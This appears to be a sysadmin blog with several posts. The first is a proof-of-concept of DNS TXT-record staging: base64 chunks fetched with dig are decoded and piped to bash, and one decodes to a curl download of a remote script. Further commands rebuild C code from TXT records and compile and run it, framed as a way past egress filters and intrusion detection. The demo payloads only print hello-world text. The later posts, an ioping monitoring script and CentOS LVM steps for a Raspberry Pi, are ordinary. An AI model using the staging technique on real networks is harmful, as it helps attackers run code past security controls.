So what happened here? I was able to “leave” the organization to request data from an external server and retrieve it and read it. Simply put, instead of being able to use curl or wget to request something from a remote web server, I used DNS to traverse the open internet and get input from a remote server. As I said earlier, TXT records can contain ASCII text. ASCII text means data and data means exploits.

Below I will show an example of this. I will describe the environment as well, so hopefully after reading this you can understand what is going on from a technical standpoint. It will be extremely high level, because I’m not a hacker or security expert, but it will show you how you can move data between sites with DNS TXT records

The idea of obfuscating the data inside the TXT records is so that when IDSs and IPSs are inspecting the traffic, they aren’t able to really see “inside” the response. All they see is a random array of ASCII text

DISCLAIMER: I am not a security expert, nor do I pose as one. I am simply showing how hackers and malware writers are able to leverage basic functions of networking in ways that could be much harder to detect


‘client’ is an already compromised server inside an organization somewhere – whether via a disgruntled employee or what not. The only requirement is that it can query DNS. Let’s assume it’s locked down from outbound access to any server except the internal DNS server.

Again, there are a ton of assumptions here, I am just showing the concepts

I will show 2 examples. One is that I am fetching a remote bash script via curl and then executing it. The second is fetching C code and then compiling it and running it. Example 1 assumes HTTP/HTTPS outbound from the server is allowed and example 2 assumes the server has gcc installed

Example 1

client]$ dig -t TXT | grep ^txt	6601	IN	TXT	"Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu"

client]$ dig -t TXT | grep ^txt	7141	IN	TXT	"cGhwCg=="

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' 

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d 
curl -s -q

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s 
#!/usr/bin/env bash

echo "Hello world! I was downloaded from with instructions from a TXT DNS record"
exit 0

client]$ dig -t TXT | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s  | bash -s
Hello world! I was downloaded from with instructions from a TXT DNS record

So what happened? You can see that I can query the first TXT record and get data, then query the second and get the rest of the base64 encoded string. Together, these two lines give me the curl command for fetching the bash script hosted on my server. I then decode it and run it, which spits out “Hello world!”

The magic here is the base64 encoded data. Of course, I am sure IDSs and IPSs can pick this up, but base64 is a good, quick, and easy way to obfuscate data and try to hide

This example just proves the concept of how to move data or instructions between a remote external DNS server and a “secured” internal server

Example 2

Now we’re going to fetch some C code from TXT records and run it. The previous example assumed HTTP/HTTPS (ports 80 and 443) outbound was open. Well, what if this isn’t the case? What if we, for instance, see that the kernel on server ‘client’ is susceptible to a privilege escalation exploit? Perfect! Let’s get some code from DNS TXT records!


# Get the first line of the base64 encoded C code
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"

# Get the second line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"

# Get the third line
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now get them all at once
client]$ dig -t TXT | grep ^c_code_line 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g" 3562	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k" 3564	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# We still have quotes, want to get rid of them
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }'

# Now its cleaned up, its literal base64 encoded text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"'

# When we pass it to openssl -d we can see the actual text
client]$ dig -t TXT | grep ^c_code_line | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d
#include <stdio.h>
int main() {
	printf( "hello world\nI was downloaded through a TXT record and compiled locally" );
	return 0;
}
# Now lets pass it to a file and compile it with GCC
client]$ dig -t TXT | grep ^c_code_line | \
> awk '{ print $5 }' | tr -d '"' | \
> openssl enc -base64 -d > /var/tmp/txt.poc.c; gcc -o /var/tmp/txt.poc /var/tmp/txt.poc.c; /var/tmp/txt.poc
hello world
I was downloaded through a TXT record and compiled locally


So what you can see here is that we were able to successfully move C code via DNS TXT records. Of course, large exploits would require many lines, but things such as shellcode privilege escalation exploits would be far fewer
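Putting the client side together, a reassembly loop might look like the sketch below. The domain and record prefix are stand-ins, since the real ones are redacted in this post:

```shell
#!/usr/bin/env bash
# Stand-in values -- substitute the attacker-controlled domain
DOMAIN="example.net"
PREFIX="c_code_line"
COUNT=3

out=""
for n in $(seq 1 "${COUNT}"); do
	# dig +short prints just the quoted TXT payload; strip the quotes
	chunk=$(dig +short -t TXT "${PREFIX}${n}.${DOMAIN}" | tr -d '"')
	out="${out}${chunk}"
done

# Decode the reassembled base64 back into compilable C source
printf '%s' "${out}" | base64 -d > /var/tmp/txt.poc.c
```

From there it is the same gcc + execute step shown in example 2.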

I hope you found this post informative. Any mistakes I made or anything not clear please feel free to drop a line in the comments


iomonitor – wrapper script for ioping

Link to it on my github because formatting is screwed up here

This is a wrapper script for ioping. It can be run from a cronjob or as an NRPE command for Nagios. Use --nagios-perfdata to generate perfdata for Nagios to consume

I needed a way to track I/O latency on a VM hypervisor node (ovirt) because one ovirt node of 3 kept reporting latency to storage, but it was the only one reporting it (and it was guaranteed not a config issue). I set this up in Nagios to run every minute for 15 runs, which usually takes ~15 seconds

This is what it looks like inside NagiosXI
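To wire it into NRPE, a sketch of the command definition — the command name, install path, and thresholds here are all assumptions, not values from my setup; baseline your own as described in the script comments:

```
# /etc/nagios/nrpe.cfg -- hypothetical path and thresholds
command[check_io_latency]=/usr/local/bin/iomonitor --directory /var/tmp \
    --min-warn 0.001 --min-crit 0.005 --max-warn 0.5 --max-crit 1.0 \
    --avg-warn 0.01 --avg-crit 0.05 --count 15 --nagios-perfdata
```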


#!/usr/bin/env bash

# Wrapper script for ioping. Can be implemented in to a cron
# job or as an NRPE command for nagios. Use --nagios-perfdata to generate perfdata
# for Nagios to consume
# I needed a way to track I/O latency on a VM hypervisor node (ovirt)
# because the ovirt engine kept reporting latencies but it was the only one
# reporting it (and guaranteed not a config issue). I set this up in nagios 
# to run every minute and run for 15 runs which is usually ~15 seconds
# It is suggested to first get a baseline for what your system looks like by
# running the script with all zeros for crit/warn then using "raw data" line 
# to generate some  values you consider warn/critical. I used a 
# count of 120 (2 minutes) then min/max/avg * 1.5 for warning and * 2.5 for critical
#	* While running this I did the following on my home directory
#		while [ true ]; do ls -alhtrR $HOME; done
#	to generate some I/O without using DD, figured all the stat() calls would be
#	better geared towards real use 
# Example:
#	./iomonitor --directory /tmp --min-warn 0 --min-crit 0 --max-warn 0 --max-crit 0 --avg-warn 0 --avg-crit 0 --count 120

# Check dependencies
if [ -z "$(command -v ioping)" ]; then
	echo "* ERROR: Cannot find ioping command"
	exit 254
fi

if [ -z "$(command -v bc)" ]; then
	echo "* ERROR: Cannot find bc command"
	exit 254
fi

# This prints when using the -v flag
function debug_write() {
	if [ ${dbg} ]; then
		echo "* $@"
	fi
}
# Collect arguments
function setargs() {
	while [ "$1" != "" ]; do
		case $1 in
			"--min-warn") shift; min_warn=$1 ;;
			"--min-crit") shift; min_crit=$1 ;;
			"--max-warn") shift; max_warn=$1 ;;
			"--max-crit") shift; max_crit=$1 ;;
			"--avg-warn") shift; avg_warn=$1 ;;
			"--avg-crit") shift; avg_crit=$1 ;;
			"--nagios-perfdata") perfdata=1 ;;
			"-c" | "--count") shift; count=$1 ;;
			"-d" | "--directory") shift; directory=$1 ;;
			"-v" | "--verbose") dbg=1 ;;
		esac
		shift
	done
}

setargs "$@"

# Startup
debug_write "min_warn=${min_warn}"
debug_write "min_crit=${min_crit}"
debug_write "max_warn=${max_warn}"
debug_write "max_crit=${max_crit}"
debug_write "avg_warn=${avg_warn}"
debug_write "avg_crit=${avg_crit}"
debug_write "count=${count}"
debug_write "directory=${directory}"

# If count is empty, default to 15
if [ -z ${count} ]; then
	count=15
fi

# Move in to the directory for ioping to run
cd "${directory}"
cdres=$?
if [ ${cdres} -ne 0 ]; then
	echo "* ERROR: Failed to CD to ${directory} to run ioping test. Exiting"
	exit 254
fi
# Stuff
debug_write "Current directory - $(pwd)"

# Run ioping
debug_write "Running ${count} times"
cmd=$(ioping -c ${count} .)

# --verbose
debug_write "output: ${cmd}"

# Grep the line we care about
line=$(echo "${cmd}" | grep "^min/avg/max/mdev" )
debug_write "line: '${line}'"

# Now awk the fields out
data_lines=$(echo "${line}" | awk '{ print $3 " " $4 "\n" $6 " " $7 "\n" $9 " " $10 "\n" $12 " " $13 };')

# Array for data parsing
declare -a data

# Conversions
IFS=$(echo -en "\n\b")
for i in $(echo "${data_lines}"); do
	# TODO: Make what to convert to an argument
	# we default now to seconds. People may want to monitor at ms level
	#... but I suck at math

	value=$(echo "$i" | cut -d ' ' -f1)
	unit=$(echo "$i" | cut -d ' ' -f2)
	case "${unit}" in
		"us") conversion="0.000001" ;;
		"ms") conversion="0.001" ;;
		"s")  conversion="1" ;;
		*)
			echo "* ERROR: Received unit we could not convert. Got ${unit}"
			exit 245
			;;
	esac

	debug_write "(${unit}) - ${value} * ${conversion}"
	converted=$(echo "scale=6; ${value} * ${conversion}" | bc | awk '{printf "%f", $0}')
	data+=("${converted}")
done

# The stats line is ordered min/avg/max/mdev
min="${data[0]}"
avg="${data[1]}"
max="${data[2]}"
mdev="${data[3]}"

debug_write "Converted to seconds: $min / $avg / $max / $mdev"

# now check warn/crit

# Because im lazy and using a function is prettier
function append() {
	output="${output}$@"
}

function perfdata_append() {
	perfdataoutput="${perfdataoutput}$@ "
}
# Use BC to do float comparison
function comp() {
	bc <<< "$@"
	return $?
}

exit_warn=0
exit_crit=0

# Iterate the fields we need. Doing it this way avoids repeat code
# Why repeat code when we can use bashes flexibility?!
for i in min max avg; do
	# Yay bash variable substitution!
	# use the value when we need to and the variable name when we need to
	# ex: ${idx_name} would expand to min then $idx_warn would expand to min_warn
	# so when we use ${!idx_warn} it would expand to min_warn value (the arg input field)
	idx_inner_val="${!i}"
	idx_name="$i"
	idx_warn="${idx_name}_warn"
	idx_crit="${idx_name}_crit"
	debug_write "${idx_inner_val} > ${!idx_warn}"
	debug_write "${idx_inner_val} < ${!idx_crit}"

	if [ $(comp "${idx_inner_val} > ${!idx_warn}") -eq 1 ] && [ $(comp "${idx_inner_val} < ${!idx_crit}") -eq 1 ]; then
		append " * WARNING: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_warn}\n"
		exit_warn=1
	fi

	if [ $(comp "${idx_inner_val} > ${!idx_crit}") -eq 1 ]; then
		append " * CRITICAL: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_crit}\n"
		exit_crit=1
	fi

	perfdata_append "${idx_name}=${idx_inner_val}"
done

# May as well print the raw data when we print anything else or the OK
append "raw data: ${line}"

# Warn / crit / OK logic 

# Crit
if [ ${exit_crit} -eq 1 ]; then
	echo -e "${output}"
	if [ ! -z "${perfdata}" ]; then
		echo -e " | ${perfdataoutput}"
	fi
	exit 2
fi

# Warn
if [ ${exit_warn} -eq 1 ]; then
	echo -e "${output}"
	if [ ! -z "${perfdata}" ]; then
		echo -e " | ${perfdataoutput}"
	fi
	exit 1
fi

# Else OK 
echo -e "OK - ${directory} latency - ${output}" | tr -d '\n'
if [ ! -z "${perfdata}" ]; then
	echo -e " | ${perfdataoutput}"
fi

exit 0
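If you’d rather drive it from cron than NRPE, something like this would work — the path and thresholds are assumptions; baseline your own values first as the script comments suggest:

```
# Hypothetical crontab entry: run every minute, append results to a log
* * * * * /usr/local/bin/iomonitor --directory /var/tmp --min-warn 0.001 --min-crit 0.005 --max-warn 0.5 --max-crit 1.0 --avg-warn 0.01 --avg-crit 0.05 --count 15 >> /var/log/iomonitor.log 2>&1
```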

Moving CentOS 7 to LVM on Raspberry Pi 3 / ARMv7L

I will formalize this later when I can

  1. This is purely assuming you’re using CentOS 7 on RPI3 and have dd’ed the image per their installation instructions. This assumption underlies all the steps below
  2. Confirm your version has support via the CONFIG_BLK_DEV_INITRD kernel compile option. You can check /proc/config.gz for this; if you don’t have it, then modprobe configs
  3. Generate an initrd – dracut -f -v /boot/initrd $(uname -r)
  4. Append ‘initramfs initrd 0x01f00000’ to /boot/config.txt
  5. Modify /boot/cmdline.txt to read initrd=0x01f00000 after root=/dev/…. and before rootfstype=ext4
  6. Reboot as a test. Note that your boot time will go from about 5-10 seconds to upwards of a minute or so. You will see the Raspberry Pi splash screen for about 5 seconds as opposed to .5 or 1 second before. This is because the Pi now needs to load the 26MB initrd in to memory before continuing
  7. If it comes back up then you can move the file system now
  8. Edit /etc/fstab and change noatime for / to be ro,noatime
  9. Reboot
  10. yum install -y lvm2
  11. fdisk /dev/mmcblk0
  12. Create a new partition and exit
  13. Reboot
  14. pvcreate /dev/mmcblk0p4
  15. vgcreate root /dev/mmcblk0p4
  16. lvcreate --name="lv_root" -l 45%FREE root <---- more on this later
  17. mkdir /mnt/new
  18. mount /dev/mapper/root-lv_root /mnt/new
  19. Copy the file system: tar -cvpf - --one-file-system --acls --xattrs --selinux / | tar xpf - -C /mnt/new/
  20. Edit /boot/cmdline.txt root= to be root=/dev/mapper/root-lv_root
  21. Reboot
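Steps 10-19 above can be sketched as a single shell sequence. The device and VG/LV names match the steps; double-check them against your own partition layout before running anything, as this is destructive:

```
#!/usr/bin/env bash
# WARNING: destructive -- verify device names against your own layout first
set -e

yum install -y lvm2

# Steps 14-16: PV/VG/LV on the new fourth partition
pvcreate /dev/mmcblk0p4
vgcreate root /dev/mmcblk0p4
lvcreate --name lv_root -l 45%FREE root

# Steps 17-19: mount the new LV and copy the running root fs into it
mkdir -p /mnt/new
mount /dev/mapper/root-lv_root /mnt/new
tar -cvpf - --one-file-system --acls --xattrs --selinux / | tar xpf - -C /mnt/new/
```

After the copy, point root= in /boot/cmdline.txt at the new mapper device per step 20 and reboot.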


Test Post

Please ignore

